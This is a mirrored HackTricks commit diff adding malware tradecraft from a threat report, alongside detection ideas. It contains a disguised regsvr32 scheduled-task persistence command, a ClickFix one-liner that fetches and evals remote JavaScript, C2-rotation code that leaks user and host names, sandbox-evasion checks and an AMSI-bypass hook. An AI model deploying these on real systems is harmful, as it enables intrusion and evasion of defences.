mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge pull request #1413 from HackTricks-wiki/update_Under_the_Pure_Curtain__From_RAT_to_Builder_to_Cod_20250916_184356
Under the Pure Curtain From RAT to Builder to Coder
This commit is contained in:
commit
92692ccdc3
@ -267,7 +267,27 @@ regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
||||
|
||||
**Detected by defender**
|
||||
|
||||
#### Regsvr32 -sct
|
||||
#### Regsvr32 – arbitrary DLL export with /i argument (gatekeeping & persistence)
|
||||
|
||||
Besides loading remote scriptlets (`scrobj.dll`), `regsvr32.exe` will load a local DLL and invoke its `DllRegisterServer`/`DllUnregisterServer` exports. Custom loaders frequently abuse this to execute arbitrary code while blending with a signed LOLBin. Two tradecraft notes seen in the wild:
|
||||
|
||||
- Gatekeeping argument: the DLL exits unless a specific switch is passed via `/i:<arg>`, e.g. `/i:--type=renderer` to mimic Chromium renderer children. This reduces accidental execution and frustrates sandboxes.
|
||||
- Persistence: schedule `regsvr32` to run the DLL with silent + high privileges and the required `/i` argument, masquerading as an updater task:
|
||||
```powershell
|
||||
Register-ScheduledTask \
|
||||
-Action (New-ScheduledTaskAction -Execute "regsvr32" -Argument "/s /i:--type=renderer \"%APPDATA%\Microsoft\SystemCertificates\<name>.dll\"") \
|
||||
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \
|
||||
-TaskName 'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}' \
|
||||
-TaskPath '\\GoogleSystem\\GoogleUpdater' \
|
||||
-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) \
|
||||
-RunLevel Highest
|
||||
```
|
||||
|
||||
See also: ClickFix clipboard‑to‑PowerShell variant that stages a JS loader and later persists with `regsvr32`.
|
||||
{{#ref}}
|
||||
../../generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
[**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
|
||||
|
||||
@ -555,6 +575,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
|
||||
- [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
|
||||
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||
- [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
- [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -65,7 +65,45 @@ mshta https://iplogger.co/xxxx =+\\xxx
|
||||
|
||||
The **mshta** call launches a hidden PowerShell script that retrieves `PartyContinued.exe`, extracts `Boat.pst` (CAB), reconstructs `AutoIt3.exe` through `extrac32` & file concatenation and finally runs an `.a3x` script which exfiltrates browser credentials to `sumeriavgv.digital`.
|
||||
|
||||
## Detection & Hunting
|
||||
## ClickFix: Clipboard → PowerShell → JS eval → Startup LNK with rotating C2 (PureHVNC)
|
||||
|
||||
Some ClickFix campaigns skip file downloads entirely and instruct victims to paste a one‑liner that fetches and executes JavaScript via WSH, persists it, and rotates C2 daily. Example observed chain:
|
||||
|
||||
```powershell
|
||||
powershell -c "$j=$env:TEMP+'\a.js';sc $j 'a=new
|
||||
ActiveXObject(\"MSXML2.XMLHTTP\");a.open(\"GET\",\"63381ba/kcilc.ellrafdlucolc//:sptth\".split(\"\").reverse().join(\"\"),0);a.send();eval(a.responseText);';wscript $j" Prеss Entеr
|
||||
```
|
||||
|
||||
Key traits
|
||||
- Obfuscated URL reversed at runtime to defeat casual inspection.
|
||||
- JavaScript persists itself via a Startup LNK (WScript/CScript), and selects the C2 by current day – enabling rapid domain rotation.
|
||||
|
||||
Minimal JS fragment used to rotate C2s by date:
|
||||
```js
|
||||
function getURL() {
|
||||
var C2_domain_list = ['stathub.quest','stategiq.quest','mktblend.monster','dsgnfwd.xyz','dndhub.xyz'];
|
||||
var current_datetime = new Date().getTime();
|
||||
var no_days = getDaysDiff(0, current_datetime);
|
||||
return 'https://'
|
||||
+ getListElement(C2_domain_list, no_days)
|
||||
+ '/Y/?t=' + current_datetime
|
||||
+ '&v=5&p=' + encodeURIComponent(user_name + '_' + pc_name + '_' + first_infection_datetime);
|
||||
}
|
||||
```
|
||||
|
||||
Next stage commonly deploys a loader that establishes persistence and pulls a RAT (e.g., PureHVNC), often pinning TLS to a hardcoded certificate and chunking traffic.
|
||||
|
||||
Detection ideas specific to this variant
|
||||
- Process tree: `explorer.exe` → `powershell.exe -c` → `wscript.exe <temp>\a.js` (or `cscript.exe`).
|
||||
- Startup artifacts: LNK in `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` invoking WScript/CScript with a JS path under `%TEMP%`/`%APPDATA%`.
|
||||
- Registry/RunMRU and command‑line telemetry containing `.split('').reverse().join('')` or `eval(a.responseText)`.
|
||||
- Repeated `powershell -NoProfile -NonInteractive -Command -` with large stdin payloads to feed long scripts without long command lines.
|
||||
- Scheduled Tasks that subsequently execute LOLBins such as `regsvr32 /s /i:--type=renderer "%APPDATA%\Microsoft\SystemCertificates\<name>.dll"` under an updater‑looking task/path (e.g., `\GoogleSystem\GoogleUpdater`).
|
||||
|
||||
Threat hunting
|
||||
- Daily‑rotating C2 hostnames and URLs with `.../Y/?t=<epoch>&v=5&p=<encoded_user_pc_firstinfection>` pattern.
|
||||
- Correlate clipboard write events followed by Win+R paste then immediate `powershell.exe` execution.
|
||||
|
||||
|
||||
Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:
|
||||
|
||||
@ -93,5 +131,6 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin
|
||||
|
||||
- [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
|
||||
- [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking)
|
||||
- [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -17,6 +17,11 @@
|
||||
| write() | send() |
|
||||
| shutdown() | WSACleanup() |
|
||||
|
||||
### TLS pinning and chunked transport
|
||||
|
||||
Many loaders wrap their TCP stream in `SslStream` and pin the server’s leaf certificate against an embedded copy (certificate pinning). Bot info/tasks are compressed (e.g., GZip). When responses exceed a threshold (~1 MB), data is fragmented into small chunks (e.g., 16 KB segments) to avoid size-based heuristics and reduce memory spikes during deserialisation.
|
||||
|
||||
|
||||
### Persistence
|
||||
|
||||
| Registry | File | Service |
|
||||
@ -49,6 +54,24 @@
|
||||
| CreateToolhelp32Snapshot \[Check if a process is running] | |
|
||||
| CreateFileW/A \[Check if a file exist] | |
|
||||
|
||||
### Emulator API fingerprinting & sleep evasion
|
||||
|
||||
Malware often fingerprints sandbox emulators by searching for Defender’s virtualised exports (seen in the Malware Protection Emulator). If any of these symbols are present (case-insensitive scan of the process), execution is delayed for 10–30 minutes and re-checked to waste analysis time.
|
||||
|
||||
Examples of API names used as canaries:
|
||||
- `MpVmp32Entry`, `MpVmp32FastEnter`, `MpCallPreEntryPointCode`, `MpCallPostEntryPointCode`, `MpFinalize`, `MpReportEvent*`, `MpSwitchToNextThread*`
|
||||
- `VFS_*` family: `VFS_Open`, `VFS_Read`, `VFS_MapViewOfFile`, `VFS_UnmapViewOfFile`, `VFS_FindFirstFile/FindNextFile`, `VFS_CopyFile`, `VFS_DeleteFile`, `VFS_MoveFile`
|
||||
- `ThrdMgr_*`: `ThrdMgr_GetCurrentThreadHandle`, `ThrdMgr_SaveTEB`, `ThrdMgr_SwitchThreads`
|
||||
|
||||
Typical delay primitive (user-land):
|
||||
```cmd
|
||||
cmd /c timeout /t %RANDOM_IN_[600,1800]% > nul
|
||||
```
|
||||
|
||||
Argument gatekeeping
|
||||
- Operators sometimes require a benign-looking CLI switch to be present before running the payload (e.g., `/i:--type=renderer` to mimic Chromium child processes). If the switch is absent, the loader exits immediately, hindering naive sandbox execution.
|
||||
|
||||
|
||||
### Stealth
|
||||
|
||||
| Name | |
|
||||
@ -190,6 +213,7 @@ Detection ideas:
|
||||
## References
|
||||
|
||||
- [Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
|
||||
- [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -275,7 +275,42 @@ This technique was initially discovered by [@RastaMouse](https://twitter.com/_Ra
|
||||
|
||||
There are also many other techniques used to bypass AMSI with powershell, check out [**this page**](basic-powershell-for-pentesters/index.html#amsi-bypass) and [**this repo**](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) to learn more about them.
|
||||
|
||||
This tools [**https://github.com/Flangvik/AMSI.fail**](https://github.com/Flangvik/AMSI.fail) also generates script to bypass AMSI.
|
||||
### Blocking AMSI by preventing amsi.dll load (LdrLoadDll hook)
|
||||
|
||||
AMSI is initialised only after `amsi.dll` is loaded into the current process. A robust, language‑agnostic bypass is to place a user‑mode hook on `ntdll!LdrLoadDll` that returns an error when the requested module is `amsi.dll`. As a result, AMSI never loads and no scans occur for that process.
|
||||
|
||||
Implementation outline (x64 C/C++ pseudocode):
|
||||
```c
|
||||
#include <windows.h>
|
||||
#include <winternl.h>
|
||||
|
||||
typedef NTSTATUS (NTAPI *pLdrLoadDll)(PWSTR, ULONG, PUNICODE_STRING, PHANDLE);
|
||||
static pLdrLoadDll realLdrLoadDll;
|
||||
|
||||
NTSTATUS NTAPI Hook_LdrLoadDll(PWSTR path, ULONG flags, PUNICODE_STRING module, PHANDLE handle){
|
||||
if (module && module->Buffer){
|
||||
UNICODE_STRING amsi; RtlInitUnicodeString(&amsi, L"amsi.dll");
|
||||
if (RtlEqualUnicodeString(module, &amsi, TRUE)){
|
||||
// Pretend the DLL cannot be found → AMSI never initialises in this process
|
||||
return STATUS_DLL_NOT_FOUND; // 0xC0000135
|
||||
}
|
||||
}
|
||||
return realLdrLoadDll(path, flags, module, handle);
|
||||
}
|
||||
|
||||
void InstallHook(){
|
||||
HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
|
||||
realLdrLoadDll = (pLdrLoadDll)GetProcAddress(ntdll, "LdrLoadDll");
|
||||
// Apply inline trampoline or IAT patching to redirect to Hook_LdrLoadDll
|
||||
// e.g., Microsoft Detours / MinHook / custom 14‑byte jmp thunk
|
||||
}
|
||||
```
|
||||
Notes
|
||||
- Works across PowerShell, WScript/CScript and custom loaders alike (anything that would otherwise load AMSI).
|
||||
- Pair with feeding scripts over stdin (`PowerShell.exe -NoProfile -NonInteractive -Command -`) to avoid long command‑line artefacts.
|
||||
- Seen used by loaders executed through LOLBins (e.g., `regsvr32` calling `DllRegisterServer`).
|
||||
|
||||
This tools [https://github.com/Flangvik/AMSI.fail](https://github.com/Flangvik/AMSI.fail) also generates script to bypass AMSI.
|
||||
|
||||
**Remove the detected signature**
|
||||
|
||||
@ -906,4 +941,6 @@ References for PPL and tooling
|
||||
- [CreateProcessAsPPL launcher](https://github.com/2x7EQ13/CreateProcessAsPPL)
|
||||
- [Zero Salarium – Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html)
|
||||
|
||||
- [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
Loading…
x
Reference in New Issue
Block a user